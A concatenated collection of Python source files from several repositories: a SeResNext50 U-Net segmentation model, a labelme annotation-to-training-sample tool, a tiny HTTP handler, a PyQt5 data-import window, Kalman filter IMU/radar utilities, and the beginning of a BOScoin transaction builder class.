dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return dec10
def forward(self, x):
dec10_0 = self.forward1(x[:, :3, :, :])
dec10_1 = self.forward1(x[:, 3:, :, :])
dec10 = torch.cat([dec10_0, dec10_1], 1)
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Double_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Double_KD, self).__init__()
encoder_filters = np.asarray([64, 256, 512, 1024, 2048])
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5] * 2, 5, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward1(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return dec10
def forward(self, x):
dec10_0 = self.forward1(x[:, :3, :, :])
dec10_1 = self.forward1(x[:, 3:, :, :])
dec10 = torch.cat([dec10_0, dec10_1], 1)
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Double_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Double_KD, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5] * 2, 5, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward1(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return dec10
def forward(self, x):
dec10_0 = self.forward1(x[:, :3, :, :])
dec10_1 = self.forward1(x[:, 3:, :, :])
dec10 = torch.cat([dec10_0, dec10_1], 1)
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
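# Minimal shape-check sketch (assumptions: se_resnext50_32x4d accepts pretrained=None so no
# weights are downloaded, and the 512x512 input sizes match the training setup above):
# if __name__ == "__main__":
#     loc = SeResNext50_Unet_Loc(pretrained=None)
#     print(loc(torch.zeros(1, 3, 512, 512)).shape)      # expected: torch.Size([1, 1, 512, 512])
#     double = SeResNext50_Unet_Double(pretrained=None)
#     print(double(torch.zeros(1, 6, 512, 512)).shape)   # expected: torch.Size([1, 5, 512, 512])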
``` |
{
"source": "Jinhui-abc/Simd",
"score": 3
} |
#### File: pythonTools/sampleTool/sampleTool.py
```python
import json
import os
from cv2 import cv2
slice_test = True  # whether to save the image crops; used only for debugging this script
def saveBinaryImages(full_path, gray_img):
'''
    : Purpose: following Song's code, write the image height and width ahead of the raw pixel bytes in the binary file.
    Used by adaBoostApp.
'''
binary_image = open(full_path, "wb")
h = gray_img.shape[0]
w = gray_img.shape[1]
binary_image.write(int(h).to_bytes(4, byteorder="little", signed=True))
binary_image.write(int(w).to_bytes(4, byteorder="little", signed=True))
binary_image.write(gray_img.tobytes())
binary_image.close()
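# The reader below is an added sketch (not part of the original tool); it inverts
# saveBinaryImages by reading the 4-byte little-endian height/width header followed
# by the raw grayscale pixel bytes.
def loadBinaryImage(full_path):
    import numpy as np
    with open(full_path, "rb") as binary_image:
        h = int.from_bytes(binary_image.read(4), byteorder="little", signed=True)
        w = int.from_bytes(binary_image.read(4), byteorder="little", signed=True)
        pixels = np.frombuffer(binary_image.read(), dtype=np.uint8)
    return pixels.reshape(h, w)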
def convertImgToGray(src_img, g_width = None, g_height = None):
'''
    : Purpose: optionally resize the source image, convert it to grayscale and return the grayscale image.
    Used by adaBoostApp.
'''
if g_width and g_height:
r_image = cv2.resize(src_img, (g_width, g_height))
else:
r_image = src_img
r_gray_image = cv2.cvtColor(r_image, cv2.COLOR_RGB2GRAY)
return r_gray_image
def os_path_check(dirs):
'''
    : Purpose: check whether the directory dirs exists and create it if it does not.
'''
if not os.path.exists(dirs):
os.makedirs(dirs)
def slice_image(src_img, x, y, w, h):
    return src_img[y:y+h, x:x+w]  # crop region given as [y0:y1, x0:x1]
def p_adaBoostApp_biz(labelme_dict, positive_folder, train_set):
'''
    : Purpose: from labelme_dict -> shapes, select the shapes whose label equals train_set -> train_label,
    read the image referenced by labelme_dict -> imagePath, crop the selected shapes, convert them to grayscale,
    save the binary files under the folder given by positive_folder -> grayscale (the crops go under /orig of that path),
    and append each crop's file name to positive_path.txt under the folder given by train_set -> train_folder;
'''
if not train_set['adaBoostApp-use']:
return
orig_path = positive_folder['original']
gray_path = positive_folder['grayscale']
full_path = os.path.abspath(os.path.join(orig_path, labelme_dict['imagePath']))
orig_img = cv2.imread(full_path)
    slice_images = []  # format: [{'x': int, 'y': int, 'w': int, 'h': int}, ...]
    for el in labelme_dict['shapes']:  # iterate over the labelme annotations
if el['shape_type'] != 'rectangle':
continue
if el['label'] != train_set['train_label']:
continue
        if len(el['points']) == 2:  # read the annotated rectangle region
x1, y1 = el['points'][0]
x2, y2 = el['points'][1]
x = min(x1, x2)
y = min(y1, y2)
w = abs(x2 - x1)
h = abs(y2 - y1)
slice_images.append( {'x':int(x), 'y':int(y), 'w':int(w), 'h':int(h)} )
serial = 0
for el in slice_images:
serial += 1
slice_bin_path = os.path.abspath(os.path.join(gray_path, labelme_dict['imagePath'].split('.')[0]))
slice_bin_path += '-binary-gray-' + str(serial)
slice_img = slice_image(orig_img, el['x'], el['y'], el['w'], el['h'])
gray_img = convertImgToGray(slice_img, train_set['app_pic_size']['width'], train_set['app_pic_size']['height'])
saveBinaryImages(slice_bin_path, gray_img)
txt_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'positive_path.txt'))
f = open(txt_full_path, "a")
f.write(slice_bin_path + '\n')
f.close()
def n_adaBoostApp_biz(dir_file, negative_folder, train_set):
'''
    : Purpose: read the file full_path, convert it to grayscale,
    save the binary file under the folder given by negative_folder -> grayscale,
    and append the file name to negative_path.txt under the folder given by train_set -> train_folder;
'''
if not train_set['adaBoostApp-use']:
return
orig_path = negative_folder['original']
gray_path = negative_folder['grayscale']
full_path = os.path.abspath(os.path.join(orig_path, dir_file))
slice_bin_path = os.path.abspath(os.path.join(gray_path, dir_file.split('.')[0])) + '-binary-gray-n'
orig_img = cv2.imread(full_path)
gray_img = convertImgToGray(orig_img, train_set['app_pic_size']['width'], train_set['app_pic_size']['height'])
saveBinaryImages(slice_bin_path, gray_img)
txt_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'negative_path.txt'))
f = open(txt_full_path, "a")
f.write(slice_bin_path + '\n')
f.close()
def p_opencv_biz(labelme_dict, positive_folder, train_set):
'''
    : Purpose: from labelme_dict -> shapes, select the shapes whose label equals train_set -> train_label,
    read the image referenced by labelme_dict -> imagePath, crop the selected shapes,
    and write the shape set into metre.info under the folder given by train_set -> train_folder;
'''
if not train_set['openCV-use']:
return
orig_path = positive_folder['original']
gray_path = positive_folder['grayscale']
full_path = os.path.abspath(os.path.join(orig_path, labelme_dict['imagePath']))
orig_img = cv2.imread(full_path)
    slice_images = []  # format: [{'x': int, 'y': int, 'w': int, 'h': int}, ...]
    for el in labelme_dict['shapes']:  # iterate over the labelme annotations
if el['shape_type'] != 'rectangle':
continue
if el['label'] != train_set['train_label']:
continue
        if len(el['points']) == 2:  # read the annotated rectangle region
x1, y1 = el['points'][0]
x2, y2 = el['points'][1]
x = min(x1, x2)
y = min(y1, y2)
w = abs(x2 - x1)
h = abs(y2 - y1)
slice_images.append( {'x':int(x), 'y':int(y), 'w':int(w), 'h':int(h)} )
serial = 0
info = full_path + ' ' + str(len(slice_images))
for el in slice_images:
serial += 1
info += ' ' + str(el['x']) + ' ' + str(el['y']) + ' ' + str(el['w']) + ' ' + str(el['h'])
        if slice_test:  # for debugging only
slice_img = slice_image(orig_img, el['x'], el['y'], el['w'], el['h'])
name_spts = labelme_dict['imagePath'].split('.')
slice_path = os.path.abspath(os.path.join(gray_path, name_spts[0] + '-' + str(serial) + '.' + name_spts[1]))
cv2.imwrite(slice_path, slice_img)
metre_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'metre.info'))
f = open(metre_full_path, "a")
f.write(info + '\n')
f.close()
def n_opencv_biz(full_path, negative_folder, train_set):
'''
    : Purpose: append the file name full_path to bg.txt under the folder given by train_set -> train_folder;
'''
if not train_set['openCV-use']:
return
txt_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'bg.txt'))
f = open(txt_full_path, "a")
f.write(full_path + '\n')
f.close()
def p_folder_traverse(positive_folder, train_set):
'''
    : Purpose: traverse the labelme-annotated JSON files under the positive_folder -> original directory
'''
orig_path = positive_folder['original']
gray_path = positive_folder['grayscale']
if not os.path.exists(orig_path):
return
if gray_path:
os_path_check(gray_path)
for dir_file in os.listdir(orig_path):
full_path = os.path.abspath(os.path.join(orig_path, dir_file))
        if os.path.isdir(full_path):  # a directory, not a file
pass
        elif dir_file.endswith('.json'):  # labelme annotation file
with open(full_path, 'r') as label_file:
label_dict = json.load(label_file)
p_opencv_biz(label_dict, positive_folder, train_set) # openCV
p_adaBoostApp_biz(label_dict, positive_folder, train_set) # adaBoostApp
else:
pass
def n_folder_traverse(negative_folder, train_set):
'''
    : Purpose: traverse the image files under the negative_folder -> original directory
'''
orig_path = negative_folder['original']
gray_path = negative_folder['grayscale']
if not os.path.exists(orig_path):
return
if gray_path:
os_path_check(gray_path)
for dir_file in os.listdir(orig_path):
full_path = os.path.abspath(os.path.join(orig_path, dir_file))
        if os.path.isdir(full_path):  # a directory, not a file
pass
        elif (dir_file.endswith('.png') or dir_file.endswith('.jpg')):  # image file
n_opencv_biz(full_path, negative_folder, train_set) # openCV
n_adaBoostApp_biz(dir_file, negative_folder, train_set) # adaBoostApp
else:
pass
if __name__ == "__main__":
with open("configure.json",'r') as load_f:
cfg_dict = json.load(load_f)
p_folder_traverse(cfg_dict['positive_folder'], cfg_dict['train_set'])
n_folder_traverse(cfg_dict['negative_folder'], cfg_dict['train_set'])
``` |
{
"source": "JinhuiLee/miniPyserver",
"score": 2
} |
#### File: JinhuiLee/miniPyserver/handler.py
```python
def hello(verb, path, query):
return "Server received your " + verb + " request" + str(query) + "\r\n"
def register(urlMapper):
urlMapper["/hello"] = hello
``` |
{
"source": "jinhuli/hikyuu",
"score": 2
} |
#### File: tools/maintain/MainWindow.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(798, 573)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 801, 571))
self.tabWidget.setObjectName("tabWidget")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.tabWidget.addTab(self.tab_2, "")
self.tabConfig = QtWidgets.QWidget()
self.tabConfig.setObjectName("tabConfig")
self.label = QtWidgets.QLabel(self.tabConfig)
self.label.setGeometry(QtCore.QRect(40, 40, 101, 16))
self.label.setObjectName("label")
self.dataDirLineEdit = QtWidgets.QLineEdit(self.tabConfig)
self.dataDirLineEdit.setGeometry(QtCore.QRect(170, 40, 301, 20))
self.dataDirLineEdit.setObjectName("dataDirLineEdit")
self.pushButton = QtWidgets.QPushButton(self.tabConfig)
self.pushButton.setGeometry(QtCore.QRect(490, 40, 75, 23))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(self.tabConfig)
self.label_2.setGeometry(QtCore.QRect(40, 90, 121, 16))
self.label_2.setObjectName("label_2")
self.lineEdit_2 = QtWidgets.QLineEdit(self.tabConfig)
self.lineEdit_2.setGeometry(QtCore.QRect(170, 90, 301, 20))
self.lineEdit_2.setObjectName("lineEdit_2")
self.groupBox = QtWidgets.QGroupBox(self.tabConfig)
self.groupBox.setGeometry(QtCore.QRect(30, 170, 561, 161))
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(20, 40, 473, 66))
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 0, 3, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem1, 1, 0, 1, 1)
spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem2, 0, 5, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem3, 0, 1, 1, 1)
self.checkBox = QtWidgets.QCheckBox(self.widget)
self.checkBox.setObjectName("checkBox")
self.gridLayout.addWidget(self.checkBox, 0, 0, 1, 1)
self.checkBox_2 = QtWidgets.QCheckBox(self.widget)
self.checkBox_2.setObjectName("checkBox_2")
self.gridLayout.addWidget(self.checkBox_2, 0, 2, 1, 1)
self.checkBox_10 = QtWidgets.QCheckBox(self.widget)
self.checkBox_10.setObjectName("checkBox_10")
self.gridLayout.addWidget(self.checkBox_10, 0, 8, 1, 1)
self.checkBox_4 = QtWidgets.QCheckBox(self.widget)
self.checkBox_4.setObjectName("checkBox_4")
self.gridLayout.addWidget(self.checkBox_4, 2, 0, 1, 1)
self.checkBox_5 = QtWidgets.QCheckBox(self.widget)
self.checkBox_5.setObjectName("checkBox_5")
self.gridLayout.addWidget(self.checkBox_5, 2, 2, 1, 1)
self.checkBox_3 = QtWidgets.QCheckBox(self.widget)
self.checkBox_3.setObjectName("checkBox_3")
self.gridLayout.addWidget(self.checkBox_3, 0, 4, 1, 1)
self.checkBox_6 = QtWidgets.QCheckBox(self.widget)
self.checkBox_6.setObjectName("checkBox_6")
self.gridLayout.addWidget(self.checkBox_6, 2, 4, 1, 1)
self.checkBox_9 = QtWidgets.QCheckBox(self.widget)
self.checkBox_9.setObjectName("checkBox_9")
self.gridLayout.addWidget(self.checkBox_9, 0, 6, 1, 1)
self.checkBox_8 = QtWidgets.QCheckBox(self.widget)
self.checkBox_8.setObjectName("checkBox_8")
self.gridLayout.addWidget(self.checkBox_8, 2, 8, 1, 1)
self.checkBox_7 = QtWidgets.QCheckBox(self.widget)
self.checkBox_7.setObjectName("checkBox_7")
self.gridLayout.addWidget(self.checkBox_7, 2, 6, 1, 1)
spacerItem4 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem4, 0, 7, 1, 1)
self.pushButton_2 = QtWidgets.QPushButton(self.tabConfig)
self.pushButton_2.setGeometry(QtCore.QRect(490, 90, 75, 23))
self.pushButton_2.setObjectName("pushButton_2")
self.tabWidget.addTab(self.tabConfig, "")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "Data Import Tool"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Tab 2"))
        self.label.setText(_translate("MainWindow", "Target data directory:"))
        self.pushButton.setText(_translate("MainWindow", "Browse"))
        self.label_2.setText(_translate("MainWindow", "TDX (TongDaXin) end-of-day data directory:"))
        self.groupBox.setTitle(_translate("MainWindow", "Data preload settings"))
        self.checkBox.setText(_translate("MainWindow", "Daily"))
        self.checkBox_2.setText(_translate("MainWindow", "Weekly"))
        self.checkBox_10.setText(_translate("MainWindow", "Yearly"))
        self.checkBox_4.setText(_translate("MainWindow", "1-minute"))
        self.checkBox_5.setText(_translate("MainWindow", "5-minute"))
        self.checkBox_3.setText(_translate("MainWindow", "Monthly"))
        self.checkBox_6.setText(_translate("MainWindow", "15-minute"))
        self.checkBox_9.setText(_translate("MainWindow", "Semi-annual"))
        self.checkBox_8.setText(_translate("MainWindow", "60-minute"))
        self.checkBox_7.setText(_translate("MainWindow", "30-minute"))
        self.pushButton_2.setText(_translate("MainWindow", "Browse"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabConfig), _translate("MainWindow", "Configuration"))
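# Minimal launcher sketch (an addition for illustration; pyuic-generated UI classes are
# normally driven from a separate entry point like this):
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())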
``` |
{
"source": "jinhwanlazy/kalman-filter-isnt-hard",
"score": 2
} |
#### File: jinhwanlazy/kalman-filter-isnt-hard/utils.py
```python
import scipy.io
from matplotlib import pyplot as plt
import numpy as np
def load_imu_data():
dt = 0.01
gyro_data = scipy.io.loadmat('./source/11.ARS/ArsGyro.mat')
acce_data = scipy.io.loadmat('./source/11.ARS/ArsAccel.mat')
ts = np.arange(len(gyro_data['wz'])) * dt
gyro = np.concatenate([
gyro_data['wx'],
gyro_data['wy'],
gyro_data['wz'],
], axis=1)
acce = np.concatenate([
acce_data['fx'],
acce_data['fy'],
acce_data['fz'],
], axis=1)
return dt, ts, gyro, acce
def load_sonar_data():
sonar_data = scipy.io.loadmat('./source/2.MovAvgFilter/SonarAlt.mat')['sonarAlt'].reshape(-1)[:500]
dt = 0.02
ts = np.arange(len(sonar_data)) * dt
return dt, ts, sonar_data[:500]
def generate_volt_data():
while True:
yield np.random.normal(14.4, 4)
def generate_pos_vel_data(dt=0.1):
pos = 0
vel = 80
while True:
w = np.random.normal(0, 10)
v = np.random.normal(0, 10)
pos += vel * dt
yield pos + v, vel
vel = 80 + w
def generate_radar_measurement_data(dt):
pos = 0
while True:
vel = np.random.normal(100, 5)
alt = np.random.normal(1000, 10)
pos = pos + vel*dt
v = np.random.normal(0, pos * 0.05)
r = (pos**2 + alt**2)**0.5 + v
yield r
def run_radar_position_estimation(kf, ts, measurements_seq):
measurements = []
estimations = []
speeds = []
altitudes = []
positions = []
for t, meas in zip(ts, measurements_seq):
kf.update(np.array([[meas]]))
state = kf.x.copy()
measurements.append(meas)
estimations.append(kf.h(state)[0, 0])
pos, spd, alt = state.reshape(3)
positions.append(pos)
speeds.append(spd)
altitudes.append(alt)
return measurements, estimations, speeds, altitudes, positions
def run_euler_attitude_estimation(kf, ts, gyro, acce):
estimations = []
for i, (g, a) in enumerate(zip(gyro, euler_from_acce(acce))):
kf.gyro = g.reshape(3, 1)
kf.update(a[:2].reshape(2, 1))
estimations.append(kf.get().reshape(1, 2))
return np.concatenate(estimations) * 180 / np.pi
def plot_xyz(ts, xyz, title=''):
fig = plt.figure(figsize=[16, 12])
fig.suptitle(title)
for i, ax, color in zip(range(xyz.shape[1]), 'xyz', 'rgb'):
fig.add_subplot(3, 1, i+1)
plt.plot(ts, xyz[:, i], color=color)
plt.ylabel(ax)
plt.xlabel('Time[sec]')
plt.show()
def plot_radar_result(ts, speeds, altitudes, positions):
def plot(ts, values, ylabel):
plt.figure(figsize=[12, 6])
plt.plot(ts, values)
plt.xlabel('Time[sec]')
plt.ylabel(ylabel)
plt.show()
plot(ts, speeds, 'Speed[m/s]')
plot(ts, altitudes, 'Altitude[m]')
plot(ts, positions, 'Position[m]')
def plot_measurement_vs_estimation(ts, measurements, estimations, ylabel=''):
plt.figure(figsize=[12, 9])
plt.plot(ts, measurements, '--', label='measured')
plt.plot(ts, estimations, label='estimated')
plt.xlabel('Time[sec]')
plt.ylabel(ylabel)
plt.legend()
plt.show()
def euler_from_gyro(ts, gyro):
attitude = np.array([[0, 0, 0]]).T
res = np.zeros((len(ts), 3), dtype=float)
for i, (dt, pqr) in enumerate(zip(ts[1:] - ts[:-1], gyro)):
phi, theta, _ = attitude.reshape(-1)
sin_phi = np.sin(phi)
cos_phi = np.cos(phi)
cos_theta = np.cos(theta)
tan_theta = np.tan(theta)
to_euler = np.array([
[1, sin_phi * tan_theta, cos_phi * tan_theta],
[0, cos_phi, -sin_phi],
[0, sin_phi * cos_theta, cos_phi * cos_theta],
])
attitude = attitude + dt * to_euler @ pqr.reshape(3, 1)
res[i+1] = attitude.reshape(-1)
return res
def euler_from_acce(acce):
g = 9.8
theta = np.arcsin(acce[:, 0] / g)
phi = np.arcsin(-acce[:, 1] / (g * np.cos(theta)))
return np.stack([phi, theta, np.zeros_like(phi)], axis=1)
def euler_from_acce2(acce):
x, y, z = acce.T
phi = np.arctan2(y, z)
theta = np.arctan2(x, (y**2 + z**2)**0.5)
return np.stack([phi, theta, np.zeros_like(phi)], axis=1)
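# Usage sketch (assumes the .mat files referenced above are present on disk):
# dt, ts, gyro, acce = load_imu_data()
# plot_xyz(ts, euler_from_gyro(ts, gyro) * 180 / np.pi, 'Euler angles integrated from gyro [deg]')
# plot_xyz(ts, euler_from_acce(acce) * 180 / np.pi, 'Euler angles from accelerometer [deg]')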
``` |
{
"source": "jinhwanlazy/py-boscoin-base",
"score": 2
} |
#### File: py-boscoin-base/boscoin_base/builder.py
```python
from .horizon import HORIZON_LIVE, HORIZON_TEST, HORIZON_STELLAR
from .horizon import Horizon
from .keypair import Keypair
from .memo import *
from .network import NETWORKS, Network
from .operation import *
from .transaction import Transaction
from .transaction_envelope import TransactionEnvelope as Te
from .utils import SignatureExistError
from .federation import *
class Builder(object):
""" build transaction and submit to horizon.
"""
def __init__(self, secret=None, address=None, horizon=None, network=None, sequence=None):
if secret:
self.key_pair = Keypair.from_seed(secret)
self.address = self.key_pair.address().decode()
else:
self.key_pair = None
self.address = None
if address is None and secret is None:
            raise Exception('No Stellar address provided.')
if address is not None and secret is None:
self.address = address
self.key_pair = None
if network:
network = network.upper()
if network not in ['PUBLIC', 'STELLAR']:
network = 'TESTNET'
self.network = network
if horizon:
self.horizon = Horizon(horizon)
elif network == 'PUBLIC':
self.horizon = Horizon(HORIZON_LIVE)
elif network == 'STELLAR':
self.horizon = Horizon(HORIZON_STELLAR)
else:
self.horizon = Horizon(HORIZON_TEST)
if sequence:
self.sequence = sequence
elif self.address:
self.sequence = self.get_sequence()
else:
self.sequence = None
self.ops = []
self.time_bounds = []
self.memo = NoneMemo()
self.fee = None
self.tx = None
self.te = None
def append_op(self, operation):
if operation not in self.ops:
self.ops.append(operation)
return self
def append_create_account_op(self, destination, starting_balance, source=None):
opts = {
'source': source,
'destination': destination,
'starting_balance': str(starting_balance)
}
op = CreateAccount(opts)
return self.append_op(op)
def append_trust_op(self, destination, code, limit=None, source=None):
line = Asset(code, destination)
if limit is not None:
limit = str(limit)
opts = {
'source': source,
'asset': line,
'limit': limit
}
op = ChangeTrust(opts)
return self.append_op(op)
def append_payment_op(self, destination, amount, asset_type='BOS',
asset_issuer=None, source=None):
asset = Asset(code=asset_type, issuer=asset_issuer)
opts = {
'source': source,
'destination': destination,
'asset': asset,
'amount': str(amount)
}
op = Payment(opts)
return self.append_op(op)
def append_path_payment_op(self, destination, send_code, send_issuer, send_max,
dest_code, dest_issuer, dest_amount, path, source=None):
        # path: a list of asset tuples, each containing a code and an issuer, e.g. [(code, issuer), (code, issuer)]
        # for the native asset you can pass ('bos', '')
send_asset = Asset(send_code, send_issuer)
dest_asset = Asset(dest_code, dest_issuer)
assets = []
for p in path:
assets.append(Asset(p[0], p[1]))
opts = {
'source': source,
'destination': destination,
'send_asset': send_asset,
'send_max': str(send_max),
'dest_asset': dest_asset,
'dest_amount': str(dest_amount),
'path': assets
}
op = PathPayment(opts)
return self.append_op(op)
def append_allow_trust_op(self, trustor, asset_code, authorize, source=None):
opts = {
'source': source,
'trustor': trustor,
'asset_code': asset_code,
'authorize': authorize
}
op = AllowTrust(opts)
return self.append_op(op)
def append_set_options_op(self, inflation_dest=None, clear_flags=None, set_flags=None,
master_weight=None, low_threshold=None, med_threshold=None,
high_threshold=None, home_domain=None, signer_address=None,
signer_type=None, signer_weight=None, source=None,
):
opts = {
'source': source,
'inflation_dest': inflation_dest,
'clear_flags': clear_flags,
'set_flags': set_flags,
'master_weight': master_weight,
'low_threshold': low_threshold,
'med_threshold': med_threshold,
'high_threshold': high_threshold,
'home_domain': bytearray(home_domain, encoding='utf-8') if home_domain else None,
'signer_address': signer_address,
'signer_type': signer_type,
